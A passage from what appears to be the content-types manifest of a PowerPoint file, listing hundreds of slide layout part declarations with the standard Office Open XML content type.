  <Override PartName="/ppt/slideLayouts/slideLayout1551.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1552.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1553.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1554.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1555.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1556.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1557.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1558.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1559.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1560.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1561.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1562.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1563.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1564.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1565.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1566.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1567.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1568.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1569.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1570.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1571.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1572.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1573.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1574.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1575.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1576.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1577.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1578.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1579.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout158.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1580.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1581.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1582.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1583.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1584.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1585.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1586.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1587.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1588.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1589.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout159.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1590.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1591.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1592.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1593.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1594.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1595.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1596.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1597.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1598.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1599.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout160.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1600.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1601.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1602.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1603.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1604.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1605.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1606.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1607.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1608.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1609.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout161.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1610.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1611.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1612.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1613.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1614.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1615.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1616.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1617.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1618.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1619.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout162.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1620.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1621.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1622.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1623.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1624.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1625.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1626.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1627.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1628.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1629.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout163.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1630.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1631.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1632.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1633.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1634.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1635.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1636.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1637.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1638.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1639.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout164.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1640.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1641.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1642.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1643.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1644.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1645.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1646.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1647.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1648.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1649.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout165.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1650.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1651.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1652.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1653.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1654.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1655.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1656.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1657.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1658.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1659.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout166.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1660.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1661.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1662.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1663.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1664.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1665.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1666.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1667.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1668.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1669.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout167.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1670.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1671.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1672.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1673.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1674.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1675.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1676.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1677.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1678.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1679.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout168.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1680.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1681.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1682.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1683.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1684.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1685.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1686.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1687.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1688.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1689.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout169.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1690.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1691.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1692.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1693.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1694.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1695.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1696.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1697.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1698.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1699.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout170.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1700.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1701.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1702.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1703.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1704.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1705.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1706.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1707.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1708.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1709.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout171.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1710.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1711.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1712.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1713.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1714.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1715.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1716.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1717.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1718.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1719.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout172.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1720.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1721.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1722.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1723.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1724.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1725.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1726.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1727.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1728.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1729.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout173.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1730.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1731.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1732.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1733.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1734.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1735.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1736.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1737.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1738.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1739.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout174.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1740.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
